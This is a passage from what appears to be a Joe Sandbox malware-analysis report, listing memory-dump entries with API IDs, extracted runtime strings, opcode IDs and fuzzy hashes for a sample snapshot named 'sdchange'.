                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: 15accebb72a8f5e0ddcf4564a58605ebade04f221aa57d613743082dc0cdcfc4
                                                                            • Instruction ID: 6decbc40f2cf0e168a991ed399f694c798147fda118f4df27f8853f620594adf
                                                                            • Opcode Fuzzy Hash: 15accebb72a8f5e0ddcf4564a58605ebade04f221aa57d613743082dc0cdcfc4
                                                                            • Instruction Fuzzy Hash: 5B411D32B00222ABDB21DE26DC41B6AB7E5FF94711F100629F955EB280DB31F856CBD1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 9030522d6b55eea93c88058072f9fe1b2e15757253bbbbcaaad6f817a0ac5ab7
                                                                            • Instruction ID: 23b853c68e46f84b0760ff5a9207cd61c6060a63c17a44cdf8323f786be764c2
                                                                            • Opcode Fuzzy Hash: 9030522d6b55eea93c88058072f9fe1b2e15757253bbbbcaaad6f817a0ac5ab7
                                                                            • Instruction Fuzzy Hash: B5318276A002299FDB60DE28DC44BFEB7F8FF44650F850556E849E3240EB30AA558BA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                            • Instruction ID: dec5cec7a909109e923c6debe2dc86d572f7d0540f13fbf9819c77c2112635c9
                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                            • Instruction Fuzzy Hash: 5D91B571E002169BDB24EE69CC80ABEF7E5FF44760F54451AEA65E72E0E730B9438760
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: aae917ed819ad435a11ac778223dd26765ddc48cedf682167569b77d879def5f
                                                                            • Instruction ID: 21b80c3af28d2d03d0448d7e1aa848a53edb4680b9a38e798d50877bd0c3bb5d
                                                                            • Opcode Fuzzy Hash: aae917ed819ad435a11ac778223dd26765ddc48cedf682167569b77d879def5f
                                                                            • Instruction Fuzzy Hash: A7813BB5D002699BDB31CF55CC45BEEB7B4AF08714F0441EAAA09B7280E7706E81CFA5